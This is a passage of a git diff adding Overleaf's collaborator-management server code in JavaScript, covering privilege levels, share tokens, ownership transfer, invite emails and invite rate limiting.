privilegeLevel + ) + if (!allowed) { + return HttpErrorHandler.forbidden( + req, + res, + 'edit collaborator limit reached' + ) + } + + await CollaboratorsHandler.promises.setCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel + ) + EditorRealTimeController.emitToRoom( + projectId, + 'project:collaboratorAccessLevel:changed', + { userId } + ) + res.sendStatus(204) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + HttpErrorHandler.notFound(req, res) + } else { + next(err) + } + } +} + +async function transferOwnership(req, res, next) { + const sessionUser = SessionManager.getSessionUser(req.session) + const projectId = req.params.Project_id + const toUserId = req.body.user_id + try { + await OwnershipTransferHandler.promises.transferOwnership( + projectId, + toUserId, + { + allowTransferToNonCollaborators: hasAdminAccess(sessionUser), + sessionUserId: new ObjectId(sessionUser._id), + ipAddress: req.ip, + } + ) + res.sendStatus(204) + } catch (err) { + if (err instanceof Errors.ProjectNotFoundError) { + HttpErrorHandler.notFound(req, res, `project not found: ${projectId}`) + } else if (err instanceof Errors.UserNotFoundError) { + HttpErrorHandler.notFound(req, res, `user not found: ${toUserId}`) + } else if (err instanceof Errors.UserNotCollaboratorError) { + HttpErrorHandler.forbidden( + req, + res, + `user ${toUserId} should be a collaborator in project ${projectId} prior to ownership transfer` + ) + } else { + next(err) + } + } +} + +async function _removeUserIdFromProject(projectId, userId) { + await CollaboratorsHandler.promises.removeUserFromProject(projectId, userId) + EditorRealTimeController.emitToRoom( + projectId, + 'userRemovedFromProject', + userId + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) +} + +async function getShareTokens(req, res) { + const projectId = req.params.Project_id + const userId = SessionManager.getLoggedInUserId(req.session) + + let tokens + if (userId) { + tokens = await CollaboratorsGetter.promises.getPublicShareTokens( + new ObjectId(userId), + new ObjectId(projectId) + ) + } else { + // anonymous access, the token is already available in the session + const readOnly = TokenAccessHandler.getRequestToken(req, projectId) + tokens = { readOnly } + } + if (!tokens) { + return res.sendStatus(403) + } + + if (tokens.readOnly || tokens.readAndWrite) { + logger.info( + { + projectId, + userId: userId || 'anonymous', + ip: req.ip, + tokens: Object.keys(tokens), + }, + 'project tokens accessed' + ) + } + + if (tokens.readOnly) { + tokens.readOnlyHashPrefix = TokenAccessHandler.createTokenHashPrefix( + tokens.readOnly + ) + } + + if (tokens.readAndWrite) { + tokens.readAndWriteHashPrefix = TokenAccessHandler.createTokenHashPrefix( + tokens.readAndWrite + ) + } + + res.json(tokens) +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs new file mode 100644 index 0000000..d63206d --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsEmailHandler.mjs @@ -0,0 +1,37 @@ +import { callbackify } from 'node:util' +import { Project } from '../../models/Project.js' +import EmailHandler from '../Email/EmailHandler.js' +import Settings from '@overleaf/settings' + +const CollaboratorsEmailHandler = { + _buildInviteUrl(project, invite) { + return `${Settings.siteUrl}/project/${project._id}/invite/token/${invite.token}` + }, + + async notifyUserOfProjectInvite(projectId, email, invite, 
sendingUser) { + // eslint-disable-next-line no-restricted-syntax + const project = await Project.findOne({ _id: projectId }) + .select('name owner_ref') + .populate('owner_ref') + .exec() + const emailOptions = { + to: email, + replyTo: project.owner_ref.email, + project: { + name: project.name, + }, + inviteUrl: CollaboratorsEmailHandler._buildInviteUrl(project, invite), + owner: project.owner_ref, + sendingUser_id: sendingUser._id, + } + await EmailHandler.promises.sendEmail('projectInvite', emailOptions) + }, +} + +export default { + promises: CollaboratorsEmailHandler, + notifyUserOfProjectInvite: callbackify( + CollaboratorsEmailHandler.notifyUserOfProjectInvite + ), + _buildInviteUrl: CollaboratorsEmailHandler._buildInviteUrl, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js b/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js new file mode 100644 index 0000000..77fb7ab --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsGetter.js @@ -0,0 +1,418 @@ +const { callbackify } = require('util') +const pLimit = require('p-limit') +const { ObjectId } = require('mongodb-legacy') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const Errors = require('../Errors/Errors') +const ProjectEditorHandler = require('../Project/ProjectEditorHandler') +const Sources = require('../Authorization/Sources') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') + +module.exports = { + getMemberIdsWithPrivilegeLevels: callbackify(getMemberIdsWithPrivilegeLevels), + getMemberIds: callbackify(getMemberIds), + getInvitedMemberIds: callbackify(getInvitedMemberIds), + getInvitedMembersWithPrivilegeLevels: callbackify( + getInvitedMembersWithPrivilegeLevels + ), + getInvitedMembersWithPrivilegeLevelsFromFields: callbackify( + getInvitedMembersWithPrivilegeLevelsFromFields + ), + getMemberIdPrivilegeLevel: callbackify(getMemberIdPrivilegeLevel), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + dangerouslyGetAllProjectsUserIsMemberOf: callbackify( + dangerouslyGetAllProjectsUserIsMemberOf + ), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), + getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { + getMemberIdsWithPrivilegeLevels, + getMemberIds, + getInvitedMemberIds, + getInvitedMembersWithPrivilegeLevels, + getInvitedMembersWithPrivilegeLevelsFromFields, + getMemberIdPrivilegeLevel, + getInvitedEditCollaboratorCount, + getInvitedPendingEditorCount, + getProjectsUserIsMemberOf, + dangerouslyGetAllProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, + isUserInvitedReadWriteMemberOfProject, + getPublicShareTokens, + userIsTokenMember, + userIsReadWriteTokenMember, + getAllInvitedMembers, + }, +} + +async function getMemberIdsWithPrivilegeLevels(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + collaberator_refs: 1, + readOnly_refs: 1, + tokenAccessReadOnly_refs: 1, + tokenAccessReadAndWrite_refs: 1, + publicAccesLevel: 1, + pendingEditor_refs: 1, + reviewer_refs: 1, + pendingReviewer_refs: 1, + }) + if (!project) { + throw new Errors.NotFoundError(`no project found with 
id ${projectId}`) + } + const memberIds = _getMemberIdsWithPrivilegeLevelsFromFields( + project.owner_ref, + project.collaberator_refs, + project.readOnly_refs, + project.tokenAccessReadAndWrite_refs, + project.tokenAccessReadOnly_refs, + project.publicAccesLevel, + project.pendingEditor_refs, + project.reviewer_refs, + project.pendingReviewer_refs + ) + return memberIds +} + +async function getMemberIds(projectId) { + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.map(m => m.id) +} + +async function getInvitedMemberIds(projectId) { + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter(m => m.source !== Sources.TOKEN).map(m => m.id) +} + +async function getInvitedMembersWithPrivilegeLevels(projectId) { + let members = await getMemberIdsWithPrivilegeLevels(projectId) + members = members.filter(m => m.source !== Sources.TOKEN) + return _loadMembers(members) +} + +async function getInvitedMembersWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + reviewerIds +) { + const members = _getMemberIdsWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + [], + [], + null, + [], + reviewerIds, + [] + ) + return _loadMembers(members) +} + +async function getMemberIdPrivilegeLevel(userId, projectId) { + // In future if the schema changes and getting all member ids is more expensive (multiple documents) + // then optimise this. + if (userId == null) { + return PrivilegeLevels.NONE + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if (member.id === userId.toString()) { + return member.privilegeLevel + } + } + return PrivilegeLevels.NONE +} + +async function getInvitedEditCollaboratorCount(projectId) { + // Counts invited members with editor or reviewer roles + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter( + m => + m.source === Sources.INVITE && + (m.privilegeLevel === PrivilegeLevels.READ_AND_WRITE || + m.privilegeLevel === PrivilegeLevels.REVIEW) + ).length +} + +async function getInvitedPendingEditorCount(projectId) { + // Only counts invited members that are readonly pending editors or pending + // reviewers + const members = await getMemberIdsWithPrivilegeLevels(projectId) + return members.filter( + m => + m.source === Sources.INVITE && + m.privilegeLevel === PrivilegeLevels.READ_ONLY && + (m.pendingEditor || m.pendingReviewer) + ).length +} + +async function isUserInvitedMemberOfProject(userId, projectId) { + if (!userId) { + return false + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if ( + member.id.toString() === userId.toString() && + member.source !== Sources.TOKEN + ) { + return true + } + } + return false +} + +async function isUserInvitedReadWriteMemberOfProject(userId, projectId) { + if (!userId) { + return false + } + const members = await getMemberIdsWithPrivilegeLevels(projectId) + for (const member of members) { + if ( + member.id.toString() === userId.toString() && + member.source !== Sources.TOKEN && + member.privilegeLevel === PrivilegeLevels.READ_AND_WRITE + ) { + return true + } + } + return false +} + +async function getPublicShareTokens(userId, projectId) { + const memberInfo = await Project.findOne( + { + _id: projectId, + }, + { + isOwner: { $eq: ['$owner_ref', userId] }, + hasTokenReadOnlyAccess: { + $and: [ + { $in: [userId, '$tokenAccessReadOnly_refs'] }, + { $eq: ['$publicAccesLevel', 
PublicAccessLevels.TOKEN_BASED] }, + ], + }, + tokens: 1, + } + ) + .lean() + .exec() + + if (!memberInfo) { + return null + } + + if (memberInfo.isOwner) { + return memberInfo.tokens + } else if (memberInfo.hasTokenReadOnlyAccess) { + return { + readOnly: memberInfo.tokens.readOnly, + } + } else { + return {} + } +} + +// This function returns all the projects that a user currently has access to, +// excluding projects where the user is listed in the token access fields when +// token access has been disabled. +async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, review, readOnly, tokenReadAndWrite, tokenReadOnly] = + await Promise.all([ + limit(() => Project.find({ collaberator_refs: userId }, fields).exec()), + limit(() => Project.find({ reviewer_refs: userId }, fields).exec()), + limit(() => Project.find({ readOnly_refs: userId }, fields).exec()), + limit(() => + Project.find( + { + tokenAccessReadAndWrite_refs: userId, + publicAccesLevel: PublicAccessLevels.TOKEN_BASED, + }, + fields + ).exec() + ), + limit(() => + Project.find( + { + tokenAccessReadOnly_refs: userId, + publicAccesLevel: PublicAccessLevels.TOKEN_BASED, + }, + fields + ).exec() + ), + ]) + return { readAndWrite, review, readOnly, tokenReadAndWrite, tokenReadOnly } +} + +// This function returns all the projects that a user is a member of, regardless of +// the current state of the project, so it includes those projects where token access +// has been disabled. +async function dangerouslyGetAllProjectsUserIsMemberOf(userId, fields) { + const readAndWrite = await Project.find( + { collaberator_refs: userId }, + fields + ).exec() + const readOnly = await Project.find({ readOnly_refs: userId }, fields).exec() + const tokenReadAndWrite = await Project.find( + { tokenAccessReadAndWrite_refs: userId }, + fields + ).exec() + const tokenReadOnly = await Project.find( + { tokenAccessReadOnly_refs: userId }, + fields + ).exec() + return { readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly } +} + +async function getAllInvitedMembers(projectId) { + try { + const rawMembers = await getInvitedMembersWithPrivilegeLevels(projectId) + const { members } = + ProjectEditorHandler.buildOwnerAndMembersViews(rawMembers) + return members + } catch (err) { + throw OError.tag(err, 'error getting members for project', { projectId }) + } +} + +async function userIsTokenMember(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + const project = await Project.findOne( + { + _id: projectId, + $or: [ + { tokenAccessReadOnly_refs: userId }, + { tokenAccessReadAndWrite_refs: userId }, + ], + }, + { + _id: 1, + } + ).exec() + return project != null +} + +async function userIsReadWriteTokenMember(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + const project = await Project.findOne( + { + _id: projectId, + tokenAccessReadAndWrite_refs: userId, + }, + { + _id: 1, + } + ).exec() + return project != null +} + +function _getMemberIdsWithPrivilegeLevelsFromFields( + ownerId, + collaboratorIds, + readOnlyIds, + tokenAccessIds, + tokenAccessReadOnlyIds, + publicAccessLevel, + pendingEditorIds, + reviewerIds, + pendingReviewerIds +) { + const members = [] + members.push({ + id: ownerId.toString(), + privilegeLevel: PrivilegeLevels.OWNER, + source: Sources.OWNER, + }) + + for (const memberId of collaboratorIds || []) { + members.push({ + id: memberId.toString(), + 
privilegeLevel: PrivilegeLevels.READ_AND_WRITE, + source: Sources.INVITE, + }) + } + + for (const memberId of readOnlyIds || []) { + const record = { + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_ONLY, + source: Sources.INVITE, + } + + if (pendingEditorIds?.some(pe => memberId.equals(pe))) { + record.pendingEditor = true + } else if (pendingReviewerIds?.some(pr => memberId.equals(pr))) { + record.pendingReviewer = true + } + members.push(record) + } + + if (publicAccessLevel === PublicAccessLevels.TOKEN_BASED) { + for (const memberId of tokenAccessIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_AND_WRITE, + source: Sources.TOKEN, + }) + } + for (const memberId of tokenAccessReadOnlyIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.READ_ONLY, + source: Sources.TOKEN, + }) + } + } + + for (const memberId of reviewerIds || []) { + members.push({ + id: memberId.toString(), + privilegeLevel: PrivilegeLevels.REVIEW, + source: Sources.INVITE, + }) + } + return members +} + +async function _loadMembers(members) { + const limit = pLimit(3) + const results = await Promise.all( + members.map(member => + limit(async () => { + const user = await UserGetter.promises.getUser(member.id, { + _id: 1, + email: 1, + features: 1, + first_name: 1, + last_name: 1, + signUpDate: 1, + }) + if (user != null) { + const record = { + user, + privilegeLevel: member.privilegeLevel, + } + if (member.pendingEditor) { + record.pendingEditor = true + } else if (member.pendingReviewer) { + record.pendingReviewer = true + } + return record + } else { + return null + } + }) + ) + ) + return results.filter(r => r != null) +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js b/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js new file mode 100644 index 0000000..05137a9 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsHandler.js @@ -0,0 +1,468 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectHelper = require('../Project/ProjectHelper') +const logger = require('@overleaf/logger') +const ContactManager = require('../Contacts/ContactManager') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const CollaboratorsGetter = require('./CollaboratorsGetter') +const Errors = require('../Errors/Errors') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') + +module.exports = { + userIsTokenMember: callbackify(userIsTokenMember), + removeUserFromProject: callbackify(removeUserFromProject), + removeUserFromAllProjects: callbackify(removeUserFromAllProjects), + addUserIdToProject: callbackify(addUserIdToProject), + transferProjects: callbackify(transferProjects), + promises: { + userIsTokenMember, + removeUserFromProject, + removeUserFromAllProjects, + addUserIdToProject, + transferProjects, + setCollaboratorPrivilegeLevel, + convertTrackChangesToExplicitFormat, + }, +} +// Forces null pendingReviewer_refs, readOnly_refs, and reviewer_refs to +// be empty arrays to avoid errors during $pull ops +// See https://github.com/overleaf/internal/issues/24610 +async function 
fixNullCollaboratorRefs(projectId) {
+  // Temporary cleanup for the case where pendingReviewer_refs is null
+  await Project.updateOne(
+    { _id: projectId, pendingReviewer_refs: { $type: 'null' } },
+    { $set: { pendingReviewer_refs: [] } }
+  ).exec()
+
+  // Temporary cleanup for the case where readOnly_refs is null
+  await Project.updateOne(
+    { _id: projectId, readOnly_refs: { $type: 'null' } },
+    { $set: { readOnly_refs: [] } }
+  ).exec()
+
+  // Temporary cleanup for the case where reviewer_refs is null
+  await Project.updateOne(
+    { _id: projectId, reviewer_refs: { $type: 'null' } },
+    { $set: { reviewer_refs: [] } }
+  ).exec()
+}
+
+async function removeUserFromProject(projectId, userId) {
+  try {
+    const project = await Project.findOne({ _id: projectId }).exec()
+
+    await fixNullCollaboratorRefs(projectId)
+
+    // Deal with the legacy boolean value for archived, in order to clear it
+    if (typeof project.archived === 'boolean') {
+      let archived = ProjectHelper.calculateArchivedArray(
+        project,
+        userId,
+        'ARCHIVE'
+      )
+
+      archived = archived.filter(id => id.toString() !== userId.toString())
+
+      await Project.updateOne(
+        { _id: projectId },
+        {
+          $set: { archived },
+          $pull: {
+            collaberator_refs: userId,
+            reviewer_refs: userId,
+            readOnly_refs: userId,
+            pendingEditor_refs: userId,
+            pendingReviewer_refs: userId,
+            tokenAccessReadOnly_refs: userId,
+            tokenAccessReadAndWrite_refs: userId,
+            trashed: userId,
+          },
+        }
+      )
+    } else {
+      await Project.updateOne(
+        { _id: projectId },
+        {
+          $pull: {
+            collaberator_refs: userId,
+            readOnly_refs: userId,
+            reviewer_refs: userId,
+            pendingEditor_refs: userId,
+            pendingReviewer_refs: userId,
+            tokenAccessReadOnly_refs: userId,
+            tokenAccessReadAndWrite_refs: userId,
+            archived: userId,
+            trashed: userId,
+          },
+        }
+      )
+    }
+  } catch (err) {
+    throw OError.tag(err, 'problem removing user from project collaborators', {
+      projectId,
+      userId,
+    })
+  }
+}
+
+async function removeUserFromAllProjects(userId) {
+  const { readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly } =
+    await CollaboratorsGetter.promises.dangerouslyGetAllProjectsUserIsMemberOf(
+      userId,
+      {
+        _id: 1,
+      }
+    )
+  const allProjects = readAndWrite
+    .concat(readOnly)
+    .concat(tokenReadAndWrite)
+    .concat(tokenReadOnly)
+  for (const project of allProjects) {
+    await removeUserFromProject(project._id, userId)
+  }
+}
+
+async function addUserIdToProject(
+  projectId,
+  addingUserId,
+  userId,
+  privilegeLevel,
+  { pendingEditor, pendingReviewer } = {}
+) {
+  const project = await ProjectGetter.promises.getProject(projectId, {
+    owner_ref: 1,
+    name: 1,
+    collaberator_refs: 1,
+    readOnly_refs: 1,
+    reviewer_refs: 1,
+    track_changes: 1,
+  })
+  let level
+  let existingUsers = project.collaberator_refs || []
+  existingUsers = existingUsers.concat(project.readOnly_refs || [])
+  existingUsers = existingUsers.map(u => u.toString())
+  if (existingUsers.includes(userId.toString())) {
+    return // User already in Project
+  }
+  if (privilegeLevel === PrivilegeLevels.READ_AND_WRITE) {
+    level = { collaberator_refs: userId }
+    logger.debug(
+      { privileges: 'readAndWrite', userId, projectId },
+      'adding user'
+    )
+  } else if (privilegeLevel === PrivilegeLevels.READ_ONLY) {
+    level = { readOnly_refs: userId }
+    if (pendingEditor) {
+      level.pendingEditor_refs = userId
+    } else if (pendingReviewer) {
+      level.pendingReviewer_refs = userId
+    }
+    logger.debug(
+      {
+        privileges: 'readOnly',
+        userId,
+        projectId,
+        pendingEditor,
+        pendingReviewer,
+      },
+      'adding user'
+    )
+  } else if
(privilegeLevel === PrivilegeLevels.REVIEW) {
+    level = { reviewer_refs: userId }
+    logger.debug({ privileges: 'reviewer', userId, projectId }, 'adding user')
+  } else {
+    throw new Error(`unknown privilegeLevel: ${privilegeLevel}`)
+  }
+
+  if (addingUserId) {
+    ContactManager.addContact(addingUserId, userId, () => {})
+  }
+
+  if (privilegeLevel === PrivilegeLevels.REVIEW) {
+    const trackChanges = await convertTrackChangesToExplicitFormat(
+      projectId,
+      project.track_changes
+    )
+    trackChanges[userId] = true
+
+    await Project.updateOne(
+      { _id: projectId },
+      { track_changes: trackChanges, $addToSet: level }
+    ).exec()
+
+    EditorRealTimeController.emitToRoom(
+      projectId,
+      'toggle-track-changes',
+      trackChanges
+    )
+  } else {
+    await Project.updateOne({ _id: projectId }, { $addToSet: level }).exec()
+  }
+
+  // Ensure there is a dedicated folder for this "new" project.
+  await TpdsUpdateSender.promises.createProject({
+    projectId,
+    projectName: project.name,
+    ownerId: project.owner_ref,
+    userId,
+  })
+
+  // Flush to TPDS in background to add files to collaborator's Dropbox
+  TpdsProjectFlusher.promises.flushProjectToTpds(projectId).catch(err => {
+    logger.error(
+      { err, projectId, userId },
+      'error flushing to TPDS after adding collaborator'
+    )
+  })
+}
+
+async function transferProjects(fromUserId, toUserId) {
+  // Find all the projects this user is part of so we can flush them to TPDS
+  const projects = await Project.find(
+    {
+      $or: [
+        { owner_ref: fromUserId },
+        { collaberator_refs: fromUserId },
+        { readOnly_refs: fromUserId },
+      ],
+    },
+    { _id: 1 }
+  ).exec()
+  const projectIds = projects.map(p => p._id)
+  logger.debug({ projectIds, fromUserId, toUserId }, 'transferring projects')
+
+  await Project.updateMany(
+    { owner_ref: fromUserId },
+    { $set: { owner_ref: toUserId } }
+  ).exec()
+
+  await Project.updateMany(
+    { collaberator_refs: fromUserId },
+    {
+      $addToSet: { collaberator_refs: toUserId },
+    }
+  ).exec()
+  await Project.updateMany(
+    { collaberator_refs: fromUserId },
+    {
+      $pull: { collaberator_refs: fromUserId },
+    }
+  ).exec()
+
+  await Project.updateMany(
+    { readOnly_refs: fromUserId },
+    {
+      $addToSet: { readOnly_refs: toUserId },
+    }
+  ).exec()
+  await Project.updateMany(
+    { readOnly_refs: fromUserId },
+    {
+      $pull: { readOnly_refs: fromUserId },
+    }
+  ).exec()
+
+  await Project.updateMany(
+    { pendingEditor_refs: fromUserId },
+    {
+      $addToSet: { pendingEditor_refs: toUserId },
+    }
+  ).exec()
+  await Project.updateMany(
+    { pendingEditor_refs: fromUserId },
+    {
+      $pull: { pendingEditor_refs: fromUserId },
+    }
+  ).exec()
+
+  await Project.updateMany(
+    { pendingReviewer_refs: fromUserId },
+    {
+      $addToSet: { pendingReviewer_refs: toUserId },
+    }
+  ).exec()
+  await Project.updateMany(
+    { pendingReviewer_refs: fromUserId },
+    {
+      $pull: { pendingReviewer_refs: fromUserId },
+    }
+  ).exec()
+
+  // Flush in background, no need to block on this
+  _flushProjects(projectIds).catch(err => {
+    logger.err(
+      { err, projectIds, fromUserId, toUserId },
+      'error flushing transferred projects to TPDS'
+    )
+  })
+}
+
+async function setCollaboratorPrivilegeLevel(
+  projectId,
+  userId,
+  privilegeLevel,
+  { pendingEditor, pendingReviewer } = {}
+) {
+  // Make sure we're only updating the project if the user is already a
+  // collaborator
+  const query = {
+    _id: projectId,
+    $or: [
+      { collaberator_refs: userId },
+      { readOnly_refs: userId },
+      { reviewer_refs: userId },
+    ],
+  }
+  let update
+
+  await fixNullCollaboratorRefs(projectId)
+
+  switch (privilegeLevel) {
+    case
PrivilegeLevels.READ_AND_WRITE: { + update = { + $pull: { + readOnly_refs: userId, + pendingEditor_refs: userId, + reviewer_refs: userId, + pendingReviewer_refs: userId, + }, + $addToSet: { collaberator_refs: userId }, + } + break + } + case PrivilegeLevels.REVIEW: { + update = { + $pull: { + readOnly_refs: userId, + pendingEditor_refs: userId, + collaberator_refs: userId, + pendingReviewer_refs: userId, + }, + $addToSet: { reviewer_refs: userId }, + } + + const project = await ProjectGetter.promises.getProject(projectId, { + track_changes: true, + }) + const newTrackChangesState = await convertTrackChangesToExplicitFormat( + projectId, + project.track_changes + ) + if (newTrackChangesState[userId] !== true) { + newTrackChangesState[userId] = true + } + if (typeof project.track_changes === 'object') { + update.$set = { [`track_changes.${userId}`]: true } + } else { + update.$set = { track_changes: newTrackChangesState } + } + break + } + case PrivilegeLevels.READ_ONLY: { + update = { + $pull: { collaberator_refs: userId, reviewer_refs: userId }, + $addToSet: { readOnly_refs: userId }, + } + + if (pendingEditor) { + update.$addToSet.pendingEditor_refs = userId + } else { + update.$pull.pendingEditor_refs = userId + } + + if (pendingReviewer) { + update.$addToSet.pendingReviewer_refs = userId + } else { + update.$pull.pendingReviewer_refs = userId + } + + break + } + default: { + throw new OError(`unknown privilege level: ${privilegeLevel}`) + } + } + const mongoResponse = await Project.updateOne(query, update).exec() + if (mongoResponse.matchedCount === 0) { + throw new Errors.NotFoundError('project or collaborator not found') + } + + if (update.$set?.track_changes) { + EditorRealTimeController.emitToRoom( + projectId, + 'toggle-track-changes', + update.$set.track_changes + ) + } +} + +async function userIsTokenMember(userId, projectId) { + if (!userId) { + return false + } + try { + const project = await Project.findOne( + { + _id: projectId, + $or: [ + { tokenAccessReadOnly_refs: userId }, + { tokenAccessReadAndWrite_refs: userId }, + ], + }, + { + _id: 1, + } + ) + return project != null + } catch (err) { + throw OError.tag(err, 'problem while checking if user is token member', { + userId, + projectId, + }) + } +} + +async function _flushProjects(projectIds) { + for (const projectId of projectIds) { + await TpdsProjectFlusher.promises.flushProjectToTpds(projectId) + } +} + +async function convertTrackChangesToExplicitFormat( + projectId, + trackChangesState +) { + if (typeof trackChangesState === 'object') { + return { ...trackChangesState } + } + + if (trackChangesState === true) { + // track changes are enabled for all + const members = + await CollaboratorsGetter.promises.getMemberIdsWithPrivilegeLevels( + projectId + ) + + const newTrackChangesState = {} + for (const { id, privilegeLevel } of members) { + if ( + [ + PrivilegeLevels.OWNER, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW, + ].includes(privilegeLevel) + ) { + newTrackChangesState[id] = true + } + } + + return newTrackChangesState + } + + return {} +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs new file mode 100644 index 0000000..c6ffba1 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs @@ -0,0 +1,399 @@ +import ProjectGetter from '../Project/ProjectGetter.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import 
UserGetter from '../User/UserGetter.js'
+import CollaboratorsGetter from './CollaboratorsGetter.js'
+import CollaboratorsInviteHandler from './CollaboratorsInviteHandler.mjs'
+import CollaboratorsInviteGetter from './CollaboratorsInviteGetter.js'
+import logger from '@overleaf/logger'
+import Settings from '@overleaf/settings'
+import EmailHelper from '../Helpers/EmailHelper.js'
+import EditorRealTimeController from '../Editor/EditorRealTimeController.js'
+import AnalyticsManager from '../Analytics/AnalyticsManager.js'
+import SessionManager from '../Authentication/SessionManager.js'
+import { RateLimiter } from '../../infrastructure/RateLimiter.js'
+import { expressify } from '@overleaf/promise-utils'
+import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js'
+import Errors from '../Errors/Errors.js'
+import AuthenticationController from '../Authentication/AuthenticationController.js'
+import PrivilegeLevels from '../Authorization/PrivilegeLevels.js'
+
+// This rate limiter allows a different number of requests depending on the
+// number of collaborators a user is allowed. This is implemented by providing
+// a number of points (P) and consuming c = floor(P / maxRequests) on each
+// request. We'd like (maxRequests + 1) requests to trigger the rate limit, so
+// one constraint that we have is that c * (maxRequests + 1) > P. This is
+// achieved if P = M^2 where M is the largest value possible for maxRequests.
+//
+// In the present case, we allow 10 requests per collaborator per 30 minutes,
+// with a maximum of 200 requests, so P = 200^2 = 40000. For example, at the
+// maximum of 200 requests we consume c = floor(40000 / 200) = 200 points per
+// request, so 201 requests consume 40200 > 40000 points and hit the limit.
+const RATE_LIMIT_POINTS = 40000
+const rateLimiter = new RateLimiter('invite-to-project-by-user-id', {
+  points: RATE_LIMIT_POINTS,
+  duration: 60 * 30,
+})
+
+async function getAllInvites(req, res) {
+  const projectId = req.params.Project_id
+  logger.debug({ projectId }, 'getting all active invites for project')
+  const invites =
+    await CollaboratorsInviteGetter.promises.getAllInvites(projectId)
+  res.json({ invites })
+}
+
+async function _checkShouldInviteEmail(email) {
+  if (Settings.restrictInvitesToExistingAccounts === true) {
+    logger.debug({ email }, 'checking if user exists with this email')
+    const user = await UserGetter.promises.getUserByAnyEmail(email, {
+      _id: 1,
+    })
+    const userExists = user?._id != null
+    return userExists
+  } else {
+    return true
+  }
+}
+
+async function _checkRateLimit(userId) {
+  let collabLimit =
+    await LimitationsManager.promises.allowedNumberOfCollaboratorsForUser(
+      userId
+    )
+
+  if (collabLimit == null || collabLimit === 0) {
+    collabLimit = 1
+  } else if (collabLimit < 0 || collabLimit > 20) {
+    collabLimit = 20
+  }
+
+  // Consume enough points to hit the rate limit at 10 * collabLimit
+  const maxRequests = 10 * collabLimit
+  const points = Math.floor(RATE_LIMIT_POINTS / maxRequests)
+  try {
+    await rateLimiter.consume(userId, points, { method: 'userId' })
+  } catch (err) {
+    if (err instanceof Error) {
+      throw err
+    } else {
+      return false
+    }
+  }
+  return true
+}
+
+async function inviteToProject(req, res) {
+  const projectId = req.params.Project_id
+  let { email, privileges } = req.body
+  const sendingUser = SessionManager.getSessionUser(req.session)
+  const sendingUserId = sendingUser._id
+  req.logger.addFields({ email, sendingUserId })
+
+  if (email === sendingUser.email) {
+    logger.debug(
+      { projectId, email, sendingUserId },
+      'cannot invite yourself to project'
+    )
+    return res.json({ invite: null, error: 'cannot_invite_self' })
+  }
+
+  logger.debug({ projectId, email,
sendingUserId }, 'inviting to project') + + let allowed = false + // can always invite read-only collaborators + if (privileges === PrivilegeLevels.READ_ONLY) { + allowed = true + } else { + allowed = await LimitationsManager.promises.canAddXEditCollaborators( + projectId, + 1 + ) + } + + if (!allowed) { + logger.debug( + { projectId, email, sendingUserId }, + 'not allowed to invite more users to project' + ) + return res.json({ invite: null }) + } + + email = EmailHelper.parseEmail(email, true) + if (email == null || email === '') { + logger.debug({ projectId, email, sendingUserId }, 'invalid email address') + return res.status(400).json({ errorReason: 'invalid_email' }) + } + + const underRateLimit = + await CollaboratorsInviteController._checkRateLimit(sendingUserId) + if (!underRateLimit) { + return res.sendStatus(429) + } + + const shouldAllowInvite = + await CollaboratorsInviteController._checkShouldInviteEmail(email) + if (!shouldAllowInvite) { + logger.debug( + { email, projectId, sendingUserId }, + 'not allowed to send an invite to this email address' + ) + return res.json({ + invite: null, + error: 